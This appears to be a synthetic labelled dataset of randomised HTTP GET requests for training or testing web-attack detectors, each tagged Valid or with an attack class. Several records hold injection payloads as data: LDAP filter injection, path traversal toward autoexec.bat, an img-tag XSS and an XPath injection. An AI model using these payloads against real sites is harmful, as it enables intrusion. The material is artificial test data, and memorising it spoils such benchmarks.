ETag: W/"gFGq_KoP8.wQ8Mju."
Expect: dgwt=t7huht4
From: 9Gep2Hrs@icRis7.net
If-Modified-Since: Thu, 03 Mar 05 21:33:21 UTC
If-Unmodified-Since: Wed, 23 Sep 09 04:45:00 GMT
If-Match: "zJDrw2pMqX9sD1aM"
If-None-Match: "tGZ5ZYZIj5FaN4Yc0aB"
If-Range: "UOb_JQz.rgsi06zB"
Max-Forwards: 7
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic bmF5bjcxZzpoSXJybmVv
Authorization: Basic cnRpY2lvbm86b0FSbXNk
Range: -0,-2986,-51980
Referer: http://www.nOhtb.st/2hjeo/necpt/etyltr.wmn
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.8 (X11; U; SunOS sun4u 7.8; az-es; rv:2.0.1) Gecko/13012139
UA-CPU: x86
UA-Disp: 183,1102,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 834x094
Via: HTTP/4.0 188.133.63.191
Transfer-Encoding: compress
Upgrade: Gdio/3.6, ryun/2.6, scha/8.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

wnUasch9toptSek=op31a&ateiels6aoLH=d7thos77o&attvtvte=huimgdn%oNx s&ttRtel= &V1OJS=RatmNvheIt9ih&H.AfyS@optk-DE=t 9t&tji9tdt=1312235&ufeuEGd=tLEu&nw3azSbe=aG8FB-8fil&Ey=3452183&rzdupgno5roZpal=rrBS8&huzryhcol=r6rtei&fTEVaglelrA4=9972&DmQtcmdgroup byZ=464

End - Id: 4626
Start - Id: 8789
class: Valid
GET /neuesue/uxnsmwa/fttan18ekkr/r7kRe_a/nyC9zVWlSPt@/eqeov3tkanfn/giaqrorOl4uwotgroRzc/s0MnErqofierHwNx/vXiaQT6Oz45A/jHIkga1yh6iied/uvpDwWZMbbjXGywQ8Miy/e0k6ymRsia2dentogle5.mspx? HTTP/1.0
Host: 105.169.132.105:80
Connection: close
Accept: audio/x-wav;q=0.8, audio/*;q=0.3, application/*
Accept-Charset: cp-932;q=0.9, x-mac-cyrillic;q=0.9, macintosh
Accept-Encoding: deflate, gzip;q=0.3, identity
Accept-Language: xs-oinA, znaaame-4Ta6tjrs, 79ejiiys-zmN30a, i1s7di-fSSl;q=0.7
Cache-Control: no-cache
Client-ip: 89.54.65.121
Cookie: TtpasswdpositionPt3=e;3fMj=puh ;ysuuNOlss=n@;ct1sL6Tdee=80
Cookie2: $Version="3"
Date: Thu, 20 Mar 08 19:30:56 CET
ETag: "fce7_Rvgq32my2N"
Expect: ptiabn
From: nq5rma@oelceseNaa.org
If-Modified-Since: Sun, 01 Oct 06 11:32:02 UTC
If-Unmodified-Since: Fri, 18 Sep 09 07:59:05 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jan 08 09:08:00 GMT
Max-Forwards: 876
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic aXRzaWU6ZGxlZA==
Authorization: eFhgea jaeGP=6iSeni
Range: 348876-,-8,27-
Referer: /o9hY6es/rHhTnFe.php4
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: erlstiAi70fSn
UA-CPU: 68000
UA-Disp: 347,7346,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 817x9608
Via: HTTP/1.5 www.Yuui.jpg:5, 0.8 36.241.122.120, HTTP/4.9 92.115.146.118
Transfer-Encoding: deflate
Upgrade: dckw/9.9, i68c/0.2, anoub/4.9, 3tidh/6.1
Warning: 295 www.nais.htm "ioTseniTrnsie" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8789
Start - Id: 12750
class: Valid
GET /nkMY/der.zd.DjIYqGWsYBhu/fsbsNauyru/c0C_BgdK/i@l3.jpg?m0thucsnlLizi=lmarceaphpeloa&TeiNEdolota=2&RO58Y@eI=90450151&t2jhjit1=r6YokS&.W1CV=909 HTTP/1.0
Host: www.qidae.cz:42927
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.8
Accept-Encoding: compress;q=0.2
Accept-Language: mdxmiorL-l;q=0.3, cscnnni-n8a9oT
Cache-Control: no-cache
Client-ip: 4.223.155.209
Cookie: 8rhhsw6dxbta=i6N;si33adjyooxf=uqi;5aas1ke=ot omSa0;eeybebS=tD~lsvbscriptmag7log;iuouS=]h;8Ss=<ffqo&ravs) 
Cookie2: $Version="3"
Date: Sun, 17 Jul 05 04:46:21 GMT
ETag: "EIM@o9wCtPgYYYdAk"
Expect: 100-continue
From: 913o@cbhrnwaT.com
If-Modified-Since: Fri, 02 Dec 05 20:24:58 CET
If-Unmodified-Since: Fri, 15 Jan 10 13:58:56 CET
If-Match: *
If-None-Match: "t13gmVtvWO@GOAn"
If-Range: *
Max-Forwards: 6
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: stgyt iacOt=tu9k
Authorization: Digest nc=A23467be
Range: 23407-76
Referer: /h4aee/iTlAje/snan/fnsIt/anoTdCTa.msf
TE: chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: ih4ea (mEkPsPhPro; eA5pWA9; iUh5rJx; oWwZOHITwj; tr8FfMn)
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 596x179
Via: HTTP/3.1 182.89.231.0, 9.2 11.186.89.24, 4.6 www.rsOomg.jpg
Transfer-Encoding: identity
Upgrade: al9/4.2, fue/6.6
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 70965960984740249888
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12750
Start - Id: 23118
class: Valid
GET /W6_evaljwindow.openkrcp_GHog/vvbqkE.1VSDDQBcLoEgB/qy5cWSxBBj/Zttoeeoejiewtom2rd/tdmnjYE18soqrir/eeeetssydpa/oOz9tvB.jpg?leatohdve8iulii=h9ZAJ&mdcMkdr2ktmt=uetreitCy6ta&3y=5237688&rikb=0&@5Pp@y9=rea&R1EmOi0exec9=7Nts&4sufE=50387623&uHtwhibnb2tpawm=zrw HTTP/1.0
Host: 179.74.10.180:80
Connection: nn4y
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tghce-e8radte, qr-goR;q=0.3, od-aeg, tt-h8
Cache-Control: only-if-cached
Client-ip: 203.12.50.133
Cookie: et=17557283;vKN4s-JI0=57546068;6oSeTurhflRit=7684019
Cookie2: $Version="0"
Date: Fri, 09 Mar 07 02:09:25 UTC
ETag: "3.I9kRFBydMo6wPbyXB"
Expect: opts
From: Hocan@osthutarg1.biz
If-Modified-Since: Sat, 19 Dec 09 12:29:24 GMT
If-Unmodified-Since: Mon, 25 Jun 07 18:43:35 CET
If-Match: "7xC.NAl_zVDkRnK"
If-None-Match: "DeCWukSF6zJqUS3cWb"
If-Range: Mon, 23 Apr 07 11:18:20 CET
Max-Forwards: 1758
MIME-Version: 8.3
Pragma: aet=Mht1oe7q
Proxy-Authorization: Digest username="w95i"
Authorization: etEds 6idhr=be9gu
Range: -515103
Referer: http://lvaye5.com/tgykd8yi/0g4ssM/wersa3/iihm57b.jpg
TE: trailers,trailers
Trailer: If-Match
User-Agent: uiosoSrnbtgo
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: HTTP/6.5 61.244.69.120
Transfer-Encoding: deflate
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 026545042
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23118
Start - Id: 8433
class: Valid
GET /ZxtermDLFRfpkmetaV/o3sowOyN9doHkreoEOwt/yYX2dbmw_U_U7Kkt0J/6R9y./rxOEHXyuqpT/5P3_j1J-B/0FRZIgf2QQyiB9@Hi/iL0Vw2r/tefneadltS/tSaP49J0/our2krquuQcSlDfSONt.css?esher=ejYo8M2fKwee&2c6amfr=677&luMnunkeis7tzfr=013&mbnOaqy1gsybae=RPewherecatfeval8I+crmochai&afqe=7835&oimsheem=hpositioneehey%25e&tfseoihtcR=655&t8aaehiM4k=eMmsnm&eEn8=Lscripteet%26dls&0ecRbs=wSF8D&ksdfn2ee3iB=47 HTTP/1.0
Host: www.i3aopcLat.de:8651
Connection: keep-alive
Accept: audio/*
Accept-Charset: iso-8859-8-i, iso-8859-6, euc-jp;q=0.5, windows-1258;q=0.7, gb2312;q=0.8
Accept-Encoding: compress, gzip
Accept-Language: smroknt-erwg, dh3nxab-9osD4rLs
Cache-Control: min-fresh=9923
Client-ip: 105.40.239.12
Cookie: iomsld6tree=uet&8o2Nh w1pbhtnr;enao=53765702;CZFY= ic4no1jd oclos;1pdt3iis=cqEss;ntlhuEItdhgmu=gRner
Cookie2: $Version="533"
Date: Sun, 22 Jan 06 06:30:27 CET
ETag: W/"zMW0mU82Doh_ULGC"
Expect: NhosUte=fshRoh6e;snrot4
From: sHet@bygd.gov
If-Modified-Since: Sun, 04 Apr 04 12:21:15 CET
If-Unmodified-Since: Sat, 02 Dec 06 24:02:52 CET
If-Match: "aqwINGtw2ju2-6-fwGNs"
If-None-Match: *
If-Range: *
Max-Forwards: 14
MIME-Version: 4.7
Pragma: Awrexnk6='a2gwpiNn'
Proxy-Authorization: Digest uri=http://xiaeia.gov/enhdtrl/gbbnahb.html
Authorization: erywD dtsqin=strto9s
Range: 504771-,85-357,-7
Referer: /Nt0xmoa/h4aeeoie/zntihU/ei3i9/zplaiTm.css
TE: deflate,trailers
Trailer: Max-Forwards
User-Agent: rmrI@a http://www.iwta8hmx.be
UA-CPU: Sparc
UA-Disp: 9749,6112,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3083x039
Via: 3.0 www.haeqxi.png
Transfer-Encoding: identity
Upgrade: pds/0.2, 5souN/0.2
Warning: 976 150.103.72.247 "eenmsntpeheliiasr4an" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 95629658613449459572
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8433
Start - Id: 15725
class: Valid
GET /esyeTva/sFjkal82/E4iatnWsha/novX642BlE/ehedlnnaakvc/r76uayn3Tyh329WM8eIb.asp?l4erl=IAi%28to820I&tteosxoi=mPax.w_bXA&admin4oHTQf2t8Bb=4317200&azsec0aaesroas=d2lbetweeny2i&irad5dEe=75342352&dCSdbpYCZn8=eiZXBR9Q02tL&DMmochahttpn=3+df&ea1s=%3E3dlspassthrus&jrzqmeple6eee=1582&OSupdateG8mcpy-iI=48126&Jeesaflneay=%26gexterm2R&oair=grnesso9m HTTP/1.0
Host: www.tienneKd.cz
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 4ac9tl-hIgdt;q=0.6, txlotSi-siaG6c
Cache-Control: max-stale
Client-ip: 140.143.199.118
Cookie: qo-0dvGS=nu3TK-MS82;mdEotlx13=860100;umeemeawem=<cmde>xnlcyyeIvt;weefm=631858;aee=r~oem
Cookie2: $Version="3"
Date: Fri, 31 Mar 06 21:12:38 GMT
ETag: W/"@z2OPvcOJlElv3KjQa"
Expect: 6eatinnv
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Sat, 10 May 08 10:06:20 CET
If-Unmodified-Since: Wed, 14 Nov 07 06:42:27 UTC
If-Match: "pY2uDme6tXvr244Ax"
If-None-Match: "Ao9GR.CJPsK3NK-Vs"
If-Range: Sun, 07 Dec 08 23:35:05 CET
Max-Forwards: 427
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWVvYnNqdDdpakllaDhodHN5ZWVZZUV2cnJlY3RvZWVlVHR0dHlkOGhmdGU=
Authorization: l3hs SiosEBl=eedchr
Range: 2-,-372
Referer: /7udogEnE/Esqn/LDAq.php
TE: trailers,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 3.7; lm-hn; rv:3.6.1) Gecko/96751707
UA-CPU: MIPS
UA-Disp: 6952,635,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 638x329
Via: 4.2 137.2.114.229
Transfer-Encoding: gzip
Upgrade: qrejo/1.3
Warning: 005 135.73.33.138 "yr2lt" 
X-Forwarded-For: 42.186.95.123
X-Serial-Number: 555023929683
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15725
Start - Id: 38269
class: LdapInjection
GET /cssiamri5eslw/.Gkbetweenih8T0@0ZY/gyKB.0Z4.HZQ/BlhcIbmni/ej/rVD5O.GppA/ao5c.bin?hhl=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Eaat6nino8oe=86 HTTP/1.0
Host: www.eOehH.biz
Connection: close
Accept: video/quicktime;q=0.2
Accept-Charset: windows-1251, shift_jis;q=0.5, utf-8
Accept-Encoding: identity;q=0.3, compress, compress;q=0.9
Accept-Language: eany6xte-e4mncwc;q=0.4
Cache-Control: max-age=03
Client-ip: 135.46.160.61
Cookie: drupTeabglDt=rL
Cookie2: $Version="03"
Date: Fri, 11 Aug 06 16:28:30 GMT
ETag: "xaVLYvomP3MKC3Xw"
Expect: cpms=ow8wwrn;perranl
From: iaon@um9ltetugp.biz
If-Modified-Since: Tue, 21 Mar 06 09:28:53 GMT
If-Unmodified-Since: Thu, 31 Aug 06 08:57:45 GMT
If-Match: *
If-None-Match: *
If-Range: "r.Xt_DnneVqfbeawUjQ"
Max-Forwards: 1
MIME-Version: 6.5
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Basic RG90bWQ6OWVhZXRzaA==
Range: -5579,771-978291,041342-
Referer: /un4t0.jsp
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: da9js (9cI9iS; oudEt6MB1)
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 7.2 207.85.189.179
Transfer-Encoding: gzip
Upgrade: 0atE/2.5
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 5189731
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38269
Start - Id: 36074
class: PathTransversal
GET /gdMBs_4SC2zRlsd8/tWAm99FNur3n/eebyuzoduad9/pXsZu2SPzXip/yV_J/aqmNd8zP1c/tkALGPnCr-sH-D5nN/srTsea4oznntneEvwl.cfm?G@oprocessing-instructionmK4N=eaemopenninok&shssbont58zeh=1pjsrt&sinjt3op5=50072701&8stV-=omwhphbaaT2Kssnr&iOime7e9ecT=3ssteiSGe&ae=oe1&T5j.8-I7=6844061&ZYpulink0s_Y=lqoem&3ieyd=sspe&juFKWyw=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&7cXeopt=41414&@DDIQS=7325018154&Ee8=iuintjpe HTTP/1.1
Host: www.9e1tlStt.cz:80
Connection: keep-alive
Accept: application/x-tar;q=0.0, text/html;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: 8Vd-rsine, Rrt-pmeg;q=0.3, a-vEeFpeie;q=0.6, dn5haFri-Rzucnz, pofh5-rke
Cache-Control: min-fresh=644
Client-ip: 150.142.192.26
Cookie: tFdyT=osiio6ae
Cookie2: $Version="080"
Date: Sun, 30 Jan 05 03:52:33 CET
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: tsgiot5z
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 14 Oct 08 23:18:10 GMT
If-Unmodified-Since: Sun, 14 Sep 08 21:47:41 UTC
If-Match: *
If-None-Match: "SEoJqpB@sJL79pzysCs"
If-Range: Sat, 24 Jan 09 01:04:56 UTC
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: Basic Y3J0TmlhOmltbGxvYQ==
Range: 67-310757
Referer: http://www.nAmt3net.net/iEa2mwo/eirr/Aate1/ia93Eaz/m2aisrsa.jpeg
TE: deflate
Trailer: Warning
User-Agent: rlzcnteOt4b2exhqqrjr
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 039x0543
Via: FTP/6.1 www.uyxDiWo.css, 1.2 83.78.10.5:67035
Transfer-Encoding: deflate
Upgrade: sztad/3.9, y9oto/3.0
Warning: 527 www.9sie.htm:6837 "5sadjetaoq" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36074
Start - Id: 24519
class: Valid
GET /oediunOneeeottze/aexE-qjepl2VkWlqK1f2/zg/pt6or2lalstIawAaiwi/n1tAC8HoaU93-j.4g/n2kVv/iIDFQivvaKQO5Qc/gDN_t8Y2Mq7MlvxTMxKI/etWu92dWP4pojkaArq.css?EkmeEnl5oncic=as8i%3Ee+Do%5Cfo&2tihuegabnh=home8trRbe+tAoiotl&eXetcnNformWVFg=gba01lfe8f&fifeety9tEr=nt%297&TLr.iJoY4=wgeteaEboot.ini0&omPvt9oee=9&EUVYUi.a.DM=emi&3hfdwt=9esAXv&sfiframeI=ecjshhorshtmh&noim5Mea4qr5=si3logeg1dropelocationisngroup+bychhi+http&b3ekesi=Twur5ri&osnHr=814&1NsdRmtciUvtoot=s6%3Eeke&.Rallaccept=60&esedeettncmigtc=a HTTP/1.1
Host: 203.66.19.205
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-ce, big5;q=0.2, shift_jis
Accept-Encoding: *;q=0.9
Accept-Language: fhtuhop-eolr;q=0.3, wtRsat-o;q=0.3, pnmob-h;q=0.8, mrmna-dat8f;q=0.4, aE9a-sw0ttae
Cache-Control: min-fresh=5
Client-ip: 106.138.49.194
Cookie: 4gtmci7yeoornr=e9Timd0-GDM;botgsofayh8a=VCh';renE=8;tierkyl6italfs0=4f3mFdR
Cookie2: $Version="5"
Date: Sun, 05 Nov 06 23:23:34 CET
ETag: W/"Kqx9G5NvBbO08w6p_ak"
Expect: 2ay5t
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Wed, 05 Aug 09 14:17:04 UTC
If-Unmodified-Since: Thu, 02 Sep 04 19:22:01 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Nov 06 10:32:47 GMT
Max-Forwards: 717
MIME-Version: 3.9
Pragma: 8aew='smvmsr'
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: Digest uri=/otdgfyh8/66pb/repTr.swf
Range: 82473-,14-52,-8
Referer: /4rne2dr/Gkai/fndyUe.bin
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 5.9; ia-vp; rv:0.2.3) Gecko/38737391
UA-CPU: PowerPC
UA-Disp: 1408,616,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 303x667
Via: FTP/5.6 www.cIp1.shtml:49, HTTP/5.4 www.wsrrcwe.shtml:3
Transfer-Encoding: identity
Upgrade: nosecb/9.7, rdda/0.4, Rnsei/5.1, ndhta/4.6
Warning: 566 www.Xphrezsp.htm "njtsn" "Sat, 25 Mar 06 03:51:16 UTC"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24519
Start - Id: 47643
class: XSS
GET /3wXQf2PJtTU-1/aat/kecpSoysTtaatemhw/pebi6e0ueone/mPDvBnetcatmetaHep-/1F8OCyIo.js?niedbbIhne=%3Cimg++++src%3D%26%7B%5Balert%28%27i56iar%27%29%3B%5D%7D%3B++%3E&OterbFtA2etrfpe=0757&BC2F4=34&g-wu8T=9x%40&pe.@=php%3DToeiMb&LO4bgsound=bin3&Ssaahaln=roHr&NRpasswdDO3TzP=wJLD&B4rogtc7nri=leec+%2Fet HTTP/1.1
Host: www.Rrslewr3.biz
Connection: tsnsse8
Accept: */*
Accept-Charset: x-mac-roman;q=0.0, windows-1257, iso-8859-4, x-mac-chinesetrad;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=57289
Client-ip: 61.243.9.51
Cookie: dqDusvoxtd9=dh9S.vha;ushutdownArBvsamstyle=rxdJnhayr
Cookie2: $Version="2"
Date: Sat, 01 Apr 06 11:35:45 GMT
ETag: W/"KeyKdGthDghEQTc"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Wed, 24 Mar 10 03:02:18 GMT
If-Unmodified-Since: Tue, 23 Nov 04 22:05:49 CET
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: "lFZ0gggcJ8dQ6@gQ"
Max-Forwards: 3897
MIME-Version: 9.3
Pragma: w2gaaB4=eJsnti
Proxy-Authorization: Digest opaque="enht"
Authorization: dioam mgc6h8e=aeieIe
Range: 51-,059585-
Referer: http://www.deish.biz/EcaE/aiusl/tNdtao.ace
TE: trailers,deflate;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: uaEonoctkxtt7eaete
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: soni/1.0 www.lqtsEi.js, 8.0 249.102.209.83
Transfer-Encoding: wtree; stoak=wnhf
Upgrade: aeel/6.8, 8r7lst/5.1, dcuh/5.3, we7c9e/0.8
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47643
Start - Id: 49322
class: XPathInjection
GET /UboaTr4sbannalinete6/s2.jpg?dt6hdtetn6es=354+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+824%3D&9qxmlww=N1h&ia8pS=ol%3Eapn2eetmpyt&trwabugjhbNt=tens&twoizaIj=re7 HTTP/1.1
Host: www.He2oA.de
Connection: zertot5h
Accept: video/quicktime, video/quicktime
Accept-Charset: us-ascii;q=0.9, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=66551
Client-ip: 66.86.201.155
Cookie: snmgdejssqmo=nRRSQ4;omreheJulvn=eisqxegrrhppoo4;oIaidaomy=ti? ao  eoaeelenipd
Cookie2: $Version="4"
Date: Tue, 24 Aug 04 22:22:12 UTC
ETag: "BoY2OwHYJAF2CRWj"
Expect: dIehaWe=esyeo;tx6ezea=Ee5h3s2
From: 4ttMuS@rxedw5aaa0.fr
If-Modified-Since: Thu, 27 Apr 06 03:51:46 GMT
If-Unmodified-Since: Tue, 29 Nov 05 21:39:30 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 5809
MIME-Version: 6.3
Pragma: ele='htro'
Proxy-Authorization: Digest response="d0ae87B45D5a7ceD8A37AdE3bc88eEd6"
Authorization: Digest response="9dD04447B215CC226c7B5DDaDb54cdb9"
Range: 28823-,87212-
Referer: http://www.mpaap.it/espoa/l6emcc/toiah.mdb
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.1 (compatible; MSIE 9.9; Unix; yjO8feT; mragtfli; eii9)
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 3.0 154.46.153.249:7, 5.3 101.249.218.99, 9.2 www.dtSw.htm:8
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 462 247.12.174.34 "laiyomneitoohpnNd1mn" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49322
Start - Id: 20519
class: Valid
GET /3oHSF0j5YNi4LsNLpEyh.nsf?p3JteieuhaiIaS=s7d60tonoe&einvu6w=3902344&aCSlvca=a++vbscript&iistOror=eIPu&i1ntitvsaorg=8759789&pola6ptadeqce=n%3Enph-h9re3qaccess_log%5D&hooaaaserm=+le&rfsdAoRcm=Ea&TQwu5ihsttrel=bs3ktste&OA=tQoTT&mochapuD=73065131&efnueg8t=8iu8&wgeeo=o HTTP/1.0
Host: www.uys4l.ch
Connection: keep-alive
Accept: image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 84.84.100.25
Cookie: EBdrRliriw6fab=aetycoDmno;vwiee=hrmar;ce8niusp=23312764;lEieidaate5oe3S=9r8-8qDNKVfx;8r=329889;ci1wemHrAdi=2610367930
Cookie2: $Version="156"
Date: Fri, 31 Oct 08 12:10:22 UTC
ETag: "6S8bQj.V8fdx.K6"
Expect: 100-continue
From: ttui@snpa.it
If-Modified-Since: Tue, 14 Aug 07 16:13:32 CET
If-Unmodified-Since: Tue, 04 Dec 07 02:34:11 UTC
If-Match: *
If-None-Match: "wvR-.P9JjagPzSfyMj"
If-Range: Wed, 10 Dec 08 06:00:56 UTC
Max-Forwards: 8
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic dGx0MHJzZTpybnN1
Authorization: Basic b2lhbzphc2lvOQ==
Range: -6,89-60
Referer: /atroed/boart/afaieeeo/eaiLe.nsf
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/7.0 (Windows; U; Win98 3.4; oM-oi; rv:9.2.9) Gecko/96084226
UA-CPU: StrongARM
UA-Disp: 027,9138,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5447x066
Via: 2.3 129.83.106.81, 3.2 9.9.179.66:765, lhasin/9.2 www.nbeeeja.htm
Transfer-Encoding: compress
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 500 www.mgeon1n.html "tiaaeedotnm" 
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20519
Start - Id: 16324
class: Valid
GET /cmZJQaWJ7Ds4Iao.swf?sehso=60&eiAosohelcdrne=639182&3evalmJD=eqHW_zVWJ.ZL&e9Sbe2ec2iTeRa=629071 HTTP/1.0
Host: www.gizin.ch
Connection: osvkei
Accept: */*;q=0.5
Accept-Charset: windows-1257;q=0.5, x-mac-korean
Accept-Encoding: *;q=0.1
Accept-Language: amoi-cstevrj
Cache-Control: max-stale=85
Client-ip: 76.128.152.96
Cookie: vtY2=5695;enteycorljiote=dgeTt<;dAttos= mecho'oe;j
Cookie2: $Version="725"
Date: Sun, 17 Jul 05 11:51:38 GMT
ETag: "OIq2z55.cn@ja3WSe625"
Expect: mii8=7pi0yr;blo1=Utnsh
From: fewlhd@mrbErs.biz
If-Modified-Since: Sun, 28 Nov 04 14:34:17 GMT
If-Unmodified-Since: Sat, 04 Dec 04 16:57:05 UTC
If-Match: *
If-None-Match: "IK2caHMmnCDa..BChUk"
If-Range: Sun, 25 Apr 04 01:26:21 GMT
Max-Forwards: 1892
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="82A7c3FC33BF6ce472e42Ce6b7Ca8D7B"
Authorization: Digest realm
Range: -652120,9-,091-
Referer: http://uqzd.it/eraeikya/eaet3a/9lceOeI/dsopetE.rar
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.8 (X11; U; Open BSD i386 3.5; hn-ne; rv:8.5.7) Gecko/31912557
UA-CPU: PowerPC
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 295x026
Via: FTP/8.6 www.aqt3n.css
Transfer-Encoding: gzip
Upgrade: Dei4/4.1
Warning: 533 www.sednnp.jpg "tceskevmhah" "Sat, 03 Dec 05 07:14:22 UTC"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 5823721853014
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16324
Start - Id: 27809
class: Valid
